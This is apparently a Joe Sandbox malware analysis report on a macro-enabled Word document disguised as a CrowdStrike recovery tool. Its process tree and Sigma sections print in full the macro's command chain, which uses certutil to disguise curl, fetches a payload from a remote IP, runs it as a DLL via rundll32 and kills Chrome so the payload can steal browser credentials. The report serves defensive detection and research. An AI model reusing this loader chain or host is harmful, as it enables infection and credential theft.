Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Overview

General Information

Sample name:New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Analysis ID:1478411
MD5:dd2100dfa067caae416b885637adc4ef
SHA1:499f8881f4927e7b4a1a0448f62c60741ea6d44b
SHA256:803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61
Tags:docm
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Contains functionality to steal Chrome passwords or cookies
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document exploit detected (process start blacklist hit)
Downloads suspicious files via Chrome
Machine Learning detection for dropped file
Office process queries suspicious COM object (likely to drop second stage)
Sigma detected: Legitimate Application Dropped Executable
Sigma detected: Suspicious Microsoft Office Child Process
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create an SMB header
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 2156 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • cmd.exe (PID: 3916 cmdline: C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • xcopy.exe (PID: 5308 cmdline: xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp MD5: 7E9B7CE496D09F70C072930940F9F02C)
      • certutil.exe (PID: 2496 cmdline: certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
      • certutil.exe (PID: 3552 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
      • curl.exe (PID: 2784 cmdline: C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • certutil.exe (PID: 2496 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
      • rundll32.exe (PID: 5068 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain MD5: 889B99C52A60DD49227C5E485A016679)
        • rundll32.exe (PID: 3992 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain MD5: EF3179D498793BF4234F708D3BE28633)
          • cmd.exe (PID: 5640 cmdline: C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • taskkill.exe (PID: 2144 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
  • chrome.exe (PID: 7612 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 7792 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1976,i,14189460158267219968,9438605418759963760,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 2716 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • WINWORD.EXE (PID: 3856 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • cmd.exe (PID: 6464 cmdline: C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • xcopy.exe (PID: 7500 cmdline: xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp MD5: 7E9B7CE496D09F70C072930940F9F02C)
      • certutil.exe (PID: 7576 cmdline: certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
      • certutil.exe (PID: 4820 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
      • curl.exe (PID: 8092 cmdline: C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • certutil.exe (PID: 8116 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
      • rundll32.exe (PID: 5208 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain MD5: 889B99C52A60DD49227C5E485A016679)
        • rundll32.exe (PID: 5940 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain MD5: EF3179D498793BF4234F708D3BE28633)
          • cmd.exe (PID: 2540 cmdline: C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • taskkill.exe (PID: 5680 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: File createdAuthor: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\certutil.exe, ProcessId: 3552, TargetFilename: C:\Users\user\AppData\Local\Temp\curl.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit, CommandLine: C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 2156, ParentProcessName: WINWORD.EXE, ProcessCommandLine: C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe &
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit, CommandLine: C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 2156, ParentProcessName: WINWORD.EXE, ProcessCommandLine: C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe &
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 2156, TargetFilename: C:\Users\user\Desktop\~$w_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
No Snort rule has matched
Timestamp:2024-07-22T15:58:45.771195+0200
SID:2029280
Source Port:8099
Destination Port:49195
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-07-22T15:57:48.044440+0200
SID:2029280
Source Port:8099
Destination Port:49717
Protocol:TCP
Classtype:A Network Trojan was detected

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRC0000.tmpJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008AF02B CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008AF820 CryptAcquireContextA,CryptCreateHash,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008AF860 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008A6400 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008AEC10 malloc,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008A6591 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008A3EA4 _strdup,fopen,free,fseek,ftell,fread,fclose,free,free,fseek,malloc,malloc,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,free,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008AC6E0 malloc,CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008AC730 CryptHashData,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008AC750 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C15E30 BCryptGenRandom,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BF2210 new,CryptStringToBinaryA,delete,delete,delete,CryptStringToBinaryA,CryptUnprotectData,new,delete,delete,delete,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BF2E60 new,new,new,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptCloseAlgorithmProvider,BCryptGenerateSymmetricKey,BCryptDecrypt,BCryptDecrypt,BCryptCloseAlgorithmProvider,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,delete,delete,delete,delete,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C39500 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C15B90 BCryptGenRandom,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C65EE0 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C65E90 CryptAcquireContextA,CryptCreateHash,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C65F70 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C5E0B0 CertOpenStore,GetLastError,CertCreateCertificateChainuser,GetLastError,CertGetCertificateChain,GetLastError,CertFreeCertificateChainuser,CertCloseStore,CertFreeCertificateChain,CertFreeCertificateContext,CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,_heap_alloc,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C64530 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C645B0 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C645A0 CryptHashData,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C64B30 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C5E990 CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C66EC0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0087F820 CryptAcquireContextA,CryptCreateHash,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0087F02B CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0087F860 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_00876400 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0087EC10 malloc,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_00876591 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_00873EA4 _strdup,fopen,free,fseek,ftell,fread,fclose,free,free,fseek,malloc,malloc,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,free,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0087C6E0 malloc,CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0087C730 CryptHashData,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0087C750 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Windows\System32\rundll32.exeCode function: mov dword ptr [rbp+04h], 424D53FFh
Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49772 version: TLS 1.0
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: unknownHTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49786 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49818 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49213 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49233 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49268 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49325 version: TLS 1.2
Source: Binary string: curl.pdb source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 0000000D.00000000.2155057954.00000000008B5000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: D:\c++\Mal_Cookie_x64\x64\Release\mscorsvc.pdb source: certutil.exe, 0000000E.00000003.2191196676.0000000004907000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C0B230 _Bitmask_includes,operator&=,_Bitmask_includes,_Bitmask_includes,operator&=,_Bitmask_includes,GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,operator&=,std::_Fs_file::_Fs_file,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C0B1C0 __std_fs_close_handle,FindFirstFileExW,GetLastError,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BF18C0 FindFirstFileW,new,delete,delete,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,delete,delete,delete,FindNextFileW,FindClose,delete,delete,
